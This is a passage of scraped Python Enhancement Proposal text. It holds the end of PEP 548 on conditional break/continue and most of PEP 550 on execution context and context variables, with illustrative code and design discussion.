The proposed syntax also provides a natural, Pythonic spelling of
the classic repeat ... until <expression> construct found in
other languages, and for which no good syntax has previously been
found for Python:
while:
...
break if <expression>
The tarfile module, for example, has a couple of “read until” loops like
the following:
while True:
s = self.__read(1)
if not s or s == NUL:
break
With the new syntax this would read more clearly:
while:
s = self.__read(1)
break if not s or s == NUL
The case for extending this syntax to continue is less strong,
but buttressed by the value of consistency.
It is much more common for a continue statement to be at the
end of a multiline if suite, such as this example from zipfile
while True:
try:
self.fp = io.open(file, filemode)
except OSError:
if filemode in modeDict:
filemode = modeDict[filemode]
continue
raise
break
The only opportunity for improvement the new syntax would offer for
this loop would be the omission of the True token.
On the other hand, consider this example from uuid.py:
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
if win32wnet.Netbios(ncb) != 0:
continue
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
if win32wnet.Netbios(ncb) != 0:
continue
status._unpack()
bytes = status.adapter_address[:6]
if len(bytes) != 6:
continue
return int.from_bytes(bytes, 'big')
This becomes:
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
continue if win32wnet.Netbios(ncb) != 0
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
continue if win32wnet.Netbios(ncb) != 0
status._unpack()
bytes = status.adapter_address[:6]
continue if len(bytes) != 6
return int.from_bytes(bytes, 'big')
This example indicates that there are non-trivial use cases where
continue if also improves the readability of the loop code.
It is probably significant to note that all of the examples selected
for this PEP were found by grepping the standard library for while
True and continue, and the relevant examples were found in
the first four modules inspected.
Copyright
This document is placed in the public domain.
| Rejected | PEP 548 – More Flexible Loop Control | Standards Track | This PEP proposes enhancing the break and continue statements
with an optional boolean expression that controls whether or not
they execute. This allows the flow of control in loops to be
expressed more clearly and compactly. |
PEP 550 – Execution Context
Author:
Yury Selivanov <yury at edgedb.com>,
Elvis Pranskevichus <elvis at edgedb.com>
Status:
Withdrawn
Type:
Standards Track
Created:
11-Aug-2017
Python-Version:
3.7
Post-History:
11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017,
01-Sep-2017
Table of Contents
Abstract
PEP Status
Rationale
Goals
High-Level Specification
Regular Single-threaded Code
Multithreaded Code
Generators
Coroutines and Asynchronous Tasks
Detailed Specification
Generators
contextlib.contextmanager
Enumerating context vars
coroutines
Asynchronous Generators
asyncio
Generators Transformed into Iterators
Implementation
Logical Context
Context Variables
Performance Considerations
Summary of the New APIs
Python
C API
Design Considerations
Should “yield from” leak context changes?
Should PyThreadState_GetDict() use the execution context?
PEP 521
Can Execution Context be implemented without modifying CPython?
Should we update sys.displayhook and other APIs to use EC?
Greenlets
Context manager as the interface for modifications
Setting and restoring context variables
Alternative Designs for ContextVar API
Logical Context with stacked values
ContextVar “set/reset”
Backwards Compatibility
Rejected Ideas
Replication of threading.local() interface
Coroutines not leaking context changes by default
Appendix: HAMT Performance Analysis
Acknowledgments
Version History
References
Copyright
Abstract
This PEP adds a new generic mechanism of ensuring consistent access
to non-local state in the context of out-of-order execution, such
as in Python generators and coroutines.
Thread-local storage, such as threading.local(), is inadequate for
programs that execute concurrently in the same OS thread. This PEP
proposes a solution to this problem.
PEP Status
Due to its breadth and the lack of general consensus on some aspects, this
PEP has been withdrawn and superseded by a simpler PEP 567, which has
been accepted and included in Python 3.7.
PEP 567 implements the same core idea, but limits the ContextVar support
to asynchronous tasks while leaving the generator behavior untouched.
The latter may be revisited in a future PEP.
Rationale
Prior to the advent of asynchronous programming in Python, programs
used OS threads to achieve concurrency. The need for thread-specific
state was solved by threading.local() and its C-API equivalent,
PyThreadState_GetDict().
A few examples of where Thread-local storage (TLS) is commonly
relied upon:
Context managers like decimal contexts, numpy.errstate,
and warnings.catch_warnings.
Request-related data, such as security tokens and request
data in web applications, language context for gettext etc.
Profiling, tracing, and logging in large code bases.
Unfortunately, TLS does not work well for programs which execute
concurrently in a single thread. A Python generator is the simplest
example of a concurrent program. Consider the following:
def fractions(precision, x, y):
with decimal.localcontext() as ctx:
ctx.prec = precision
yield Decimal(x) / Decimal(y)
yield Decimal(x) / Decimal(y ** 2)
g1 = fractions(precision=2, x=1, y=3)
g2 = fractions(precision=6, x=2, y=3)
items = list(zip(g1, g2))
The intuitively expected value of items is:
[(Decimal('0.33'), Decimal('0.666667')),
(Decimal('0.11'), Decimal('0.222222'))]
Rather surprisingly, the actual result is:
[(Decimal('0.33'), Decimal('0.666667')),
(Decimal('0.111111'), Decimal('0.222222'))]
This is because implicit Decimal context is stored as a thread-local,
so concurrent iteration of the fractions() generator would
corrupt the state. For Decimal, specifically, the only current
workaround is to use explicit context method calls for all arithmetic
operations [28]. Arguably, this defeats the usefulness of overloaded
operators and makes even simple formulas hard to read and write.
Coroutines are another class of Python code where TLS unreliability
is a significant issue.
The inadequacy of TLS in asynchronous code has lead to the
proliferation of ad-hoc solutions, which are limited in scope and
do not support all required use cases.
The current status quo is that any library (including the standard
library), which relies on TLS, is likely to be broken when used in
asynchronous code or with generators (see [3] as an example issue.)
Some languages, that support coroutines or generators, recommend
passing the context manually as an argument to every function, see
[1] for an example. This approach, however, has limited use for
Python, where there is a large ecosystem that was built to work with
a TLS-like context. Furthermore, libraries like decimal or
numpy rely on context implicitly in overloaded operator
implementations.
The .NET runtime, which has support for async/await, has a generic
solution for this problem, called ExecutionContext (see [2]).
Goals
The goal of this PEP is to provide a more reliable
threading.local() alternative, which:
provides the mechanism and the API to fix non-local state issues
with coroutines and generators;
implements TLS-like semantics for synchronous code, so that
users like decimal and numpy can switch to the new
mechanism with minimal risk of breaking backwards compatibility;
has no or negligible performance impact on the existing code or
the code that will be using the new mechanism, including
C extensions.
High-Level Specification
The full specification of this PEP is broken down into three parts:
High-Level Specification (this section): the description of the
overall solution. We show how it applies to generators and
coroutines in user code, without delving into implementation
details.
Detailed Specification: the complete description of new concepts,
APIs, and related changes to the standard library.
Implementation Details: the description and analysis of data
structures and algorithms used to implement this PEP, as well as
the necessary changes to CPython.
For the purpose of this section, we define execution context as an
opaque container of non-local state that allows consistent access to
its contents in the concurrent execution environment.
A context variable is an object representing a value in the
execution context. A call to contextvars.ContextVar(name)
creates a new context variable object. A context variable object has
three methods:
get(): returns the value of the variable in the current
execution context;
set(value): sets the value of the variable in the current
execution context;
delete(): can be used for restoring variable state, it’s
purpose and semantics are explained in
Setting and restoring context variables.
Regular Single-threaded Code
In regular, single-threaded code that doesn’t involve generators or
coroutines, context variables behave like globals:
var = contextvars.ContextVar('var')
def sub():
assert var.get() == 'main'
var.set('sub')
def main():
var.set('main')
sub()
assert var.get() == 'sub'
Multithreaded Code
In multithreaded code, context variables behave like thread locals:
var = contextvars.ContextVar('var')
def sub():
assert var.get() is None # The execution context is empty
# for each new thread.
var.set('sub')
def main():
var.set('main')
thread = threading.Thread(target=sub)
thread.start()
thread.join()
assert var.get() == 'main'
Generators
Unlike regular function calls, generators can cooperatively yield
their control of execution to the caller. Furthermore, a generator
does not control where the execution would continue after it yields.
It may be resumed from an arbitrary code location.
For these reasons, the least surprising behaviour of generators is
as follows:
changes to context variables are always local and are not visible
in the outer context, but are visible to the code called by the
generator;
once set in the generator, the context variable is guaranteed not
to change between iterations;
changes to context variables in outer context (where the generator
is being iterated) are visible to the generator, unless these
variables were also modified inside the generator.
Let’s review:
var1 = contextvars.ContextVar('var1')
var2 = contextvars.ContextVar('var2')
def gen():
var1.set('gen')
assert var1.get() == 'gen'
assert var2.get() == 'main'
yield 1
# Modification to var1 in main() is shielded by
# gen()'s local modification.
assert var1.get() == 'gen'
# But modifications to var2 are visible
assert var2.get() == 'main modified'
yield 2
def main():
g = gen()
var1.set('main')
var2.set('main')
next(g)
# Modification of var1 in gen() is not visible.
assert var1.get() == 'main'
var1.set('main modified')
var2.set('main modified')
next(g)
Now, let’s revisit the decimal precision example from the Rationale
section, and see how the execution context can improve the situation:
import decimal
# create a new context var
decimal_ctx = contextvars.ContextVar('decimal context')
# Pre-PEP 550 Decimal relies on TLS for its context.
# For illustration purposes, we monkey-patch the decimal
# context functions to use the execution context.
# A real working fix would need to properly update the
# C implementation as well.
def patched_setcontext(context):
decimal_ctx.set(context)
def patched_getcontext():
ctx = decimal_ctx.get()
if ctx is None:
ctx = decimal.Context()
decimal_ctx.set(ctx)
return ctx
decimal.setcontext = patched_setcontext
decimal.getcontext = patched_getcontext
def fractions(precision, x, y):
with decimal.localcontext() as ctx:
ctx.prec = precision
yield MyDecimal(x) / MyDecimal(y)
yield MyDecimal(x) / MyDecimal(y ** 2)
g1 = fractions(precision=2, x=1, y=3)
g2 = fractions(precision=6, x=2, y=3)
items = list(zip(g1, g2))
The value of items is:
[(Decimal('0.33'), Decimal('0.666667')),
(Decimal('0.11'), Decimal('0.222222'))]
which matches the expected result.
Coroutines and Asynchronous Tasks
Like generators, coroutines can yield and regain control. The major
difference from generators is that coroutines do not yield to the
immediate caller. Instead, the entire coroutine call stack
(coroutines chained by await) switches to another coroutine call
stack. In this regard, await-ing on a coroutine is conceptually
similar to a regular function call, and a coroutine chain
(or a “task”, e.g. an asyncio.Task) is conceptually similar to a
thread.
From this similarity we conclude that context variables in coroutines
should behave like “task locals”:
changes to context variables in a coroutine are visible to the
coroutine that awaits on it;
changes to context variables made in the caller prior to awaiting
are visible to the awaited coroutine;
changes to context variables made in one task are not visible in
other tasks;
tasks spawned by other tasks inherit the execution context from the
parent task, but any changes to context variables made in the
parent task after the child task was spawned are not visible.
The last point shows behaviour that is different from OS threads.
OS threads do not inherit the execution context by default.
There are two reasons for this: common usage intent and backwards
compatibility.
The main reason for why tasks inherit the context, and threads do
not, is the common usage intent. Tasks are often used for relatively
short-running operations which are logically tied to the code that
spawned the task (like running a coroutine with a timeout in
asyncio). OS threads, on the other hand, are normally used for
long-running, logically separate code.
With respect to backwards compatibility, we want the execution context
to behave like threading.local(). This is so that libraries can
start using the execution context in place of TLS with a lesser risk
of breaking compatibility with existing code.
Let’s review a few examples to illustrate the semantics we have just
defined.
Context variable propagation in a single task:
import asyncio
var = contextvars.ContextVar('var')
async def main():
var.set('main')
await sub()
# The effect of sub() is visible.
assert var.get() == 'sub'
async def sub():
assert var.get() == 'main'
var.set('sub')
assert var.get() == 'sub'
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
Context variable propagation between tasks:
import asyncio
var = contextvars.ContextVar('var')
async def main():
var.set('main')
loop.create_task(sub()) # schedules asynchronous execution
# of sub().
assert var.get() == 'main'
var.set('main changed')
async def sub():
# Sleeping will make sub() run after
# "var" is modified in main().
await asyncio.sleep(1)
# The value of "var" is inherited from main(), but any
# changes to "var" made in main() after the task
# was created are *not* visible.
assert var.get() == 'main'
# This change is local to sub() and will not be visible
# to other tasks, including main().
var.set('sub')
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
As shown above, changes to the execution context are local to the
task, and tasks get a snapshot of the execution context at the point
of creation.
There is one narrow edge case when this can lead to surprising
behaviour. Consider the following example where we modify the
context variable in a nested coroutine:
async def sub(var_value):
await asyncio.sleep(1)
var.set(var_value)
async def main():
var.set('main')
# waiting for sub() directly
await sub('sub-1')
# var change is visible
assert var.get() == 'sub-1'
# waiting for sub() with a timeout;
await asyncio.wait_for(sub('sub-2'), timeout=2)
# wait_for() creates an implicit task, which isolates
# context changes, which means that the below assertion
# will fail.
assert var.get() == 'sub-2' # AssertionError!
However, relying on context changes leaking to the caller is
ultimately a bad pattern. For this reason, the behaviour shown in
the above example is not considered a major issue and can be
addressed with proper documentation.
Detailed Specification
Conceptually, an execution context (EC) is a stack of logical
contexts. There is always exactly one active EC per Python thread.
A logical context (LC) is a mapping of context variables to their
values in that particular LC.
A context variable is an object representing a value in the
execution context. A new context variable object is created by
calling contextvars.ContextVar(name: str). The value of the
required name argument is not used by the EC machinery, but may
be used for debugging and introspection.
The context variable object has the following methods and attributes:
name: the value passed to ContextVar().
get(*, topmost=False, default=None), if topmost is False
(the default), traverses the execution context top-to-bottom, until
the variable value is found. If topmost is True, returns
the value of the variable in the topmost logical context.
If the variable value was not found, returns the value of default.
set(value): sets the value of the variable in the topmost
logical context.
delete(): removes the variable from the topmost logical context.
Useful when restoring the logical context to the state prior to the
set() call, for example, in a context manager, see
Setting and restoring context variables for more information.
Generators
When created, each generator object has an empty logical context
object stored in its __logical_context__ attribute. This logical
context is pushed onto the execution context at the beginning of each
generator iteration and popped at the end:
var1 = contextvars.ContextVar('var1')
var2 = contextvars.ContextVar('var2')
def gen():
var1.set('var1-gen')
var2.set('var2-gen')
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
# ]
n = nested_gen() # nested_gen_LC is created
next(n)
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
# ]
var1.set('var1-gen-mod')
var2.set('var2-gen-mod')
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'})
# ]
next(n)
def nested_gen():
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
# nested_gen_LC()
# ]
assert var1.get() == 'var1-gen'
assert var2.get() == 'var2-gen'
var1.set('var1-nested-gen')
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
# nested_gen_LC({var1: 'var1-nested-gen'})
# ]
yield
# EC = [
# outer_LC(),
# gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}),
# nested_gen_LC({var1: 'var1-nested-gen'})
# ]
assert var1.get() == 'var1-nested-gen'
assert var2.get() == 'var2-gen-mod'
yield
# EC = [outer_LC()]
g = gen() # gen_LC is created for the generator object `g`
list(g)
# EC = [outer_LC()]
The snippet above shows the state of the execution context stack
throughout the generator lifespan.
contextlib.contextmanager
The contextlib.contextmanager() decorator can be used to turn
a generator into a context manager. A context manager that
temporarily modifies the value of a context variable could be defined
like this:
var = contextvars.ContextVar('var')
@contextlib.contextmanager
def var_context(value):
original_value = var.get()
try:
var.set(value)
yield
finally:
var.set(original_value)
Unfortunately, this would not work straight away, as the modification
to the var variable is contained to the var_context()
generator, and therefore will not be visible inside the with
block:
def func():
# EC = [{}, {}]
with var_context(10):
# EC becomes [{}, {}, {var: 10}] in the
# *precision_context()* generator,
# but here the EC is still [{}, {}]
assert var.get() == 10 # AssertionError!
The way to fix this is to set the generator’s __logical_context__
attribute to None. This will cause the generator to avoid
modifying the execution context stack.
We modify the contextlib.contextmanager() decorator to
set genobj.__logical_context__ to None to produce
well-behaved context managers:
def func():
# EC = [{}, {}]
with var_context(10):
# EC = [{}, {var: 10}]
assert var.get() == 10
# EC becomes [{}, {var: None}]
Enumerating context vars
The ExecutionContext.vars() method returns a list of
ContextVar objects, that have values in the execution context.
This method is mostly useful for introspection and logging.
coroutines
In CPython, coroutines share the implementation with generators.
The difference is that in coroutines __logical_context__ defaults
to None. This affects both the async def coroutines and the
old-style generator-based coroutines (generators decorated with
@types.coroutine).
Asynchronous Generators
The execution context semantics in asynchronous generators does not
differ from that of regular generators.
asyncio
asyncio uses Loop.call_soon, Loop.call_later,
and Loop.call_at to schedule the asynchronous execution of a
function. asyncio.Task uses call_soon() to run the
wrapped coroutine.
We modify Loop.call_{at,later,soon} to accept the new
optional execution_context keyword argument, which defaults to
the copy of the current execution context:
def call_soon(self, callback, *args, execution_context=None):
if execution_context is None:
execution_context = contextvars.get_execution_context()
# ... some time later
contextvars.run_with_execution_context(
execution_context, callback, args)
The contextvars.get_execution_context() function returns a
shallow copy of the current execution context. By shallow copy here
we mean such a new execution context that:
lookups in the copy provide the same results as in the original
execution context, and
any changes in the original execution context do not affect the
copy, and
any changes to the copy do not affect the original execution
context.
Either of the following satisfy the copy requirements:
a new stack with shallow copies of logical contexts;
a new stack with one squashed logical context.
The contextvars.run_with_execution_context(ec, func, *args,
**kwargs) function runs func(*args, **kwargs) with ec as the
execution context. The function performs the following steps:
Set ec as the current execution context stack in the current
thread.
Push an empty logical context onto the stack.
Run func(*args, **kwargs).
Pop the logical context from the stack.
Restore the original execution context stack.
Return or raise the func() result.
These steps ensure that ec cannot be modified by func,
which makes run_with_execution_context() idempotent.
asyncio.Task is modified as follows:
class Task:
def __init__(self, coro):
...
# Get the current execution context snapshot.
self._exec_context = contextvars.get_execution_context()
# Create an empty Logical Context that will be
# used by coroutines run in the task.
coro.__logical_context__ = contextvars.LogicalContext()
self._loop.call_soon(
self._step,
execution_context=self._exec_context)
def _step(self, exc=None):
...
self._loop.call_soon(
self._step,
execution_context=self._exec_context)
...
Generators Transformed into Iterators
Any Python generator can be represented as an equivalent iterator.
Compilers like Cython rely on this axiom. With respect to the
execution context, such iterator should behave the same way as the
generator it represents.
This means that there needs to be a Python API to create new logical
contexts and run code with a given logical context.
The contextvars.LogicalContext() function creates a new empty
logical context.
The contextvars.run_with_logical_context(lc, func, *args,
**kwargs) function can be used to run functions in the specified
logical context. The lc can be modified as a result of the call.
The contextvars.run_with_logical_context() function performs the
following steps:
Push lc onto the current execution context stack.
Run func(*args, **kwargs).
Pop lc from the execution context stack.
Return or raise the func() result.
By using LogicalContext() and run_with_logical_context(),
we can replicate the generator behaviour like this:
class Generator:
def __init__(self):
self.logical_context = contextvars.LogicalContext()
def __iter__(self):
return self
def __next__(self):
return contextvars.run_with_logical_context(
self.logical_context, self._next_impl)
def _next_impl(self):
# Actual __next__ implementation.
...
Let’s see how this pattern can be applied to an example generator:
# create a new context variable
var = contextvars.ContextVar('var')
def gen_series(n):
var.set(10)
for i in range(1, n):
yield var.get() * i
# gen_series is equivalent to the following iterator:
class CompiledGenSeries:
# This class is what the `gen_series()` generator can
# be transformed to by a compiler like Cython.
def __init__(self, n):
# Create a new empty logical context,
# like the generators do.
self.logical_context = contextvars.LogicalContext()
# Initialize the generator in its LC.
# Otherwise `var.set(10)` in the `_init` method
# would leak.
contextvars.run_with_logical_context(
self.logical_context, self._init, n)
def _init(self, n):
self.i = 1
self.n = n
var.set(10)
def __iter__(self):
return self
def __next__(self):
# Run the actual implementation of __next__ in our LC.
return contextvars.run_with_logical_context(
self.logical_context, self._next_impl)
def _next_impl(self):
if self.i == self.n:
raise StopIteration
result = var.get() * self.i
self.i += 1
return result
For hand-written iterators such approach to context management is
normally not necessary, and it is easier to set and restore
context variables directly in __next__:
class MyIterator:
# ...
def __next__(self):
old_val = var.get()
try:
var.set(new_val)
# ...
finally:
var.set(old_val)
Implementation
Execution context is implemented as an immutable linked list of
logical contexts, where each logical context is an immutable weak key
mapping. A pointer to the currently active execution context is
stored in the OS thread state:
+-----------------+
| | ec
| PyThreadState +-------------+
| | |
+-----------------+ |
|
ec_node ec_node ec_node v
+------+------+ +------+------+ +------+------+
| NULL | lc |<----| prev | lc |<----| prev | lc |
+------+--+---+ +------+--+---+ +------+--+---+
| | |
LC v LC v LC v
+-------------+ +-------------+ +-------------+
| var1: obj1 | | EMPTY | | var1: obj4 |
| var2: obj2 | +-------------+ +-------------+
| var3: obj3 |
+-------------+
The choice of the immutable list of immutable mappings as a
fundamental data structure is motivated by the need to efficiently
implement contextvars.get_execution_context(), which is to be
frequently used by asynchronous tasks and callbacks. When the EC is
immutable, get_execution_context() can simply copy the current
execution context by reference:
def get_execution_context(self):
return PyThreadState_Get().ec
Let’s review all possible context modification scenarios:
The ContextVariable.set() method is called:def ContextVar_set(self, val):
# See a more complete set() definition
# in the `Context Variables` section.
tstate = PyThreadState_Get()
top_ec_node = tstate.ec
top_lc = top_ec_node.lc
new_top_lc = top_lc.set(self, val)
tstate.ec = ec_node(
prev=top_ec_node.prev,
lc=new_top_lc)
The contextvars.run_with_logical_context() is called, in which
case the passed logical context object is appended to the execution
context:def run_with_logical_context(lc, func, *args, **kwargs):
tstate = PyThreadState_Get()
old_top_ec_node = tstate.ec
new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc)
try:
tstate.ec = new_top_ec_node
return func(*args, **kwargs)
finally:
tstate.ec = old_top_ec_node
The contextvars.run_with_execution_context() is called, in which
case the current execution context is set to the passed execution
context with a new empty logical context appended to it:def run_with_execution_context(ec, func, *args, **kwargs):
tstate = PyThreadState_Get()
old_top_ec_node = tstate.ec
new_lc = contextvars.LogicalContext()
new_top_ec_node = ec_node(prev=ec, lc=new_lc)
try:
tstate.ec = new_top_ec_node
return func(*args, **kwargs)
finally:
tstate.ec = old_top_ec_node
Either genobj.send(), genobj.throw(), genobj.close()
are called on a genobj generator, in which case the logical
context recorded in genobj is pushed onto the stack:PyGen_New(PyGenObject *gen):
if (gen.gi_code.co_flags &
(CO_COROUTINE | CO_ITERABLE_COROUTINE)):
# gen is an 'async def' coroutine, or a generator
# decorated with @types.coroutine.
gen.__logical_context__ = None
else:
# Non-coroutine generator
gen.__logical_context__ = contextvars.LogicalContext()
gen_send(PyGenObject *gen, ...):
tstate = PyThreadState_Get()
if gen.__logical_context__ is not None:
old_top_ec_node = tstate.ec
new_top_ec_node = ec_node(
prev=old_top_ec_node,
lc=gen.__logical_context__)
try:
tstate.ec = new_top_ec_node
return _gen_send_impl(gen, ...)
finally:
gen.__logical_context__ = tstate.ec.lc
tstate.ec = old_top_ec_node
else:
return _gen_send_impl(gen, ...)
Coroutines and asynchronous generators share the implementation
with generators, and the above changes apply to them as well.
In certain scenarios the EC may need to be squashed to limit the
size of the chain. For example, consider the following corner case:
async def repeat(coro, delay):
await coro()
await asyncio.sleep(delay)
loop.create_task(repeat(coro, delay))
async def ping():
print('ping')
loop = asyncio.get_event_loop()
loop.create_task(repeat(ping, 1))
loop.run_forever()
In the above code, the EC chain will grow as long as repeat() is
called. Each new task will call
contextvars.run_with_execution_context(), which will append a new
logical context to the chain. To prevent unbounded growth,
contextvars.get_execution_context() checks if the chain
is longer than a predetermined maximum, and if it is, squashes the
chain into a single LC:
def get_execution_context():
tstate = PyThreadState_Get()
if tstate.ec_len > EC_LEN_MAX:
squashed_lc = contextvars.LogicalContext()
ec_node = tstate.ec
while ec_node:
# The LC.merge() method does not replace
# existing keys.
squashed_lc = squashed_lc.merge(ec_node.lc)
ec_node = ec_node.prev
return ec_node(prev=NULL, lc=squashed_lc)
else:
return tstate.ec
Logical Context
Logical context is an immutable weak key mapping which has the
following properties with respect to garbage collection:
ContextVar objects are strongly-referenced only from the
application code, not from any of the execution context machinery
or values they point to. This means that there are no reference
cycles that could extend their lifespan longer than necessary, or
prevent their collection by the GC.
Values put in the execution context are guaranteed to be kept
alive while there is a ContextVar key referencing them in
the thread.
If a ContextVar is garbage collected, all of its values will
be removed from all contexts, allowing them to be GCed if needed.
If an OS thread has ended its execution, its thread state will be
cleaned up along with its execution context, cleaning
up all values bound to all context variables in the thread.
As discussed earlier, we need contextvars.get_execution_context()
to be consistently fast regardless of the size of the execution
context, so logical context is necessarily an immutable mapping.
Choosing dict for the underlying implementation is suboptimal,
because LC.set() will cause dict.copy(), which is an O(N)
operation, where N is the number of items in the LC.
get_execution_context(), when squashing the EC, is an O(M)
operation, where M is the total number of context variable values
in the EC.
So, instead of dict, we choose Hash Array Mapped Trie (HAMT)
as the underlying implementation of logical contexts. (Scala and
Clojure use HAMT to implement high performance immutable collections
[5], [6].)
With HAMT .set() becomes an O(log N) operation, and
get_execution_context() squashing is more efficient on average due
to structural sharing in HAMT.
See Appendix: HAMT Performance Analysis for a more elaborate
analysis of HAMT performance compared to dict.
Context Variables
The ContextVar.get() and ContextVar.set() methods are
implemented as follows (in pseudo-code):
class ContextVar:
def get(self, *, default=None, topmost=False):
tstate = PyThreadState_Get()
ec_node = tstate.ec
while ec_node:
if self in ec_node.lc:
return ec_node.lc[self]
if topmost:
break
ec_node = ec_node.prev
return default
def set(self, value):
tstate = PyThreadState_Get()
top_ec_node = tstate.ec
if top_ec_node is not None:
top_lc = top_ec_node.lc
new_top_lc = top_lc.set(self, value)
tstate.ec = ec_node(
prev=top_ec_node.prev,
lc=new_top_lc)
else:
# First ContextVar.set() in this OS thread.
top_lc = contextvars.LogicalContext()
new_top_lc = top_lc.set(self, value)
tstate.ec = ec_node(
prev=NULL,
lc=new_top_lc)
def delete(self):
tstate = PyThreadState_Get()
top_ec_node = tstate.ec
if top_ec_node is None:
raise LookupError
top_lc = top_ec_node.lc
if self not in top_lc:
raise LookupError
new_top_lc = top_lc.delete(self)
tstate.ec = ec_node(
prev=top_ec_node.prev,
lc=new_top_lc)
For efficient access in performance-sensitive code paths, such as in
numpy and decimal, we cache lookups in ContextVar.get(),
making it an O(1) operation when the cache is hit. The cache key is
composed from the following:
The new uint64_t PyThreadState->unique_id, which is a globally
unique thread state identifier. It is computed from the new
uint64_t PyInterpreterState->ts_counter, which is incremented
whenever a new thread state is created.
The new uint64_t PyThreadState->stack_version, which is a
thread-specific counter, which is incremented whenever a non-empty
logical context is pushed onto the stack or popped from the stack.
The uint64_t ContextVar->version counter, which is incremented
whenever the context variable value is changed in any logical
context in any OS thread.
The cache is then implemented as follows:
class ContextVar:
def set(self, value):
... # implementation
self.version += 1
def get(self, *, default=None, topmost=False):
if topmost:
return self._get_uncached(
default=default, topmost=topmost)
tstate = PyThreadState_Get()
if (self.last_tstate_id == tstate.unique_id and
self.last_stack_ver == tstate.stack_version and
self.last_version == self.version):
return self.last_value
value = self._get_uncached(default=default)
self.last_value = value # borrowed ref
self.last_tstate_id = tstate.unique_id
self.last_stack_version = tstate.stack_version
self.last_version = self.version
return value
Note that last_value is a borrowed reference. We assume that
if the version checks are fine, the value object will be alive.
This allows the values of context variables to be properly garbage
collected.
This generic caching approach is similar to what the current C
implementation of decimal does to cache the current decimal
context, and has similar performance characteristics.
Performance Considerations
Tests of the reference implementation based on the prior
revisions of this PEP have shown 1-2% slowdown on generator
microbenchmarks and no noticeable difference in macrobenchmarks.
The performance of non-generator and non-async code is not
affected by this PEP.
Summary of the New APIs
Python
The following new Python APIs are introduced by this PEP:
The new contextvars.ContextVar(name: str='...') class,
instances of which have the following:
the read-only .name attribute,
the .get() method, which returns the value of the variable
in the current execution context;
the .set() method, which sets the value of the variable in
the current logical context;
the .delete() method, which removes the value of the variable
from the current logical context.
The new contextvars.ExecutionContext() class, which represents
an execution context.
The new contextvars.LogicalContext() class, which represents
a logical context.
The new contextvars.get_execution_context() function, which
returns an ExecutionContext instance representing a copy of
the current execution context.
The contextvars.run_with_execution_context(ec: ExecutionContext,
func, *args, **kwargs) function, which runs func with the
provided execution context.
The contextvars.run_with_logical_context(lc: LogicalContext,
func, *args, **kwargs) function, which runs func with the
provided logical context on top of the current execution context.
C API
PyContextVar * PyContext_NewVar(char *desc): create a
PyContextVar object.
PyObject * PyContext_GetValue(PyContextVar *, int topmost):
return the value of the variable in the current execution context.
int PyContext_SetValue(PyContextVar *, PyObject *): set
the value of the variable in the current logical context.
int PyContext_DelValue(PyContextVar *): delete the value of
the variable from the current logical context.
PyLogicalContext * PyLogicalContext_New(): create a new empty
PyLogicalContext.
PyExecutionContext * PyExecutionContext_New(): create a new
empty PyExecutionContext.
PyExecutionContext * PyExecutionContext_Get(): return the
current execution context.
int PyContext_SetCurrent(
PyExecutionContext *, PyLogicalContext *): set the
passed EC object as the current execution context for the active
thread state, and/or set the passed LC object as the current
logical context.
Design Considerations
Should “yield from” leak context changes?
No. It may be argued that yield from is semantically
equivalent to calling a function, and should leak context changes.
However, it is not possible to satisfy the following at the same time:
next(gen) does not leak context changes made in gen, and
yield from gen leaks context changes made in gen.
The reason is that yield from can be used with a partially
iterated generator, which already has local context changes:
var = contextvars.ContextVar('var')
def gen():
for i in range(10):
var.set('gen')
yield i
def outer_gen():
var.set('outer_gen')
g = gen()
yield next(g)
# Changes not visible during partial iteration,
# the goal of this PEP:
assert var.get() == 'outer_gen'
yield from g
assert var.get() == 'outer_gen' # or 'gen'?
Another example would be refactoring of an explicit for..in yield
construct to a yield from expression. Consider the following
code:
def outer_gen():
var.set('outer_gen')
for i in gen():
yield i
assert var.get() == 'outer_gen'
which we want to refactor to use yield from:
def outer_gen():
var.set('outer_gen')
yield from gen()
assert var.get() == 'outer_gen' # or 'gen'?
The above examples illustrate that it is unsafe to refactor
generator code using yield from when it can leak context changes.
Thus, the only well-defined and consistent behaviour is to
always isolate context changes in generators, regardless of
how they are being iterated.
Should PyThreadState_GetDict() use the execution context?
No. PyThreadState_GetDict is based on TLS, and changing its
semantics will break backwards compatibility.
PEP 521
PEP 521 proposes an alternative solution to the problem, which
extends the context manager protocol with two new methods:
__suspend__() and __resume__(). Similarly, the asynchronous
context manager protocol is also extended with __asuspend__() and
__aresume__().
This allows implementing context managers that manage non-local state,
which behave correctly in generators and coroutines.
For example, consider the following context manager, which uses
execution state:
class Context:
def __init__(self):
self.var = contextvars.ContextVar('var')
def __enter__(self):
self.old_x = self.var.get()
self.var.set('something')
def __exit__(self, *err):
self.var.set(self.old_x)
An equivalent implementation with PEP 521:
local = threading.local()
class Context:
def __enter__(self):
self.old_x = getattr(local, 'x', None)
local.x = 'something'
def __suspend__(self):
local.x = self.old_x
def __resume__(self):
local.x = 'something'
def __exit__(self, *err):
local.x = self.old_x
The downside of this approach is the addition of significant new
complexity to the context manager protocol and the interpreter
implementation. This approach is also likely to negatively impact
the performance of generators and coroutines.
Additionally, the solution in PEP 521 is limited to context
managers, and does not provide any mechanism to propagate state in
asynchronous tasks and callbacks.
Can Execution Context be implemented without modifying CPython?
No.
It is true that the concept of “task-locals” can be implemented
for coroutines in libraries (see, for example, [29] and [30]).
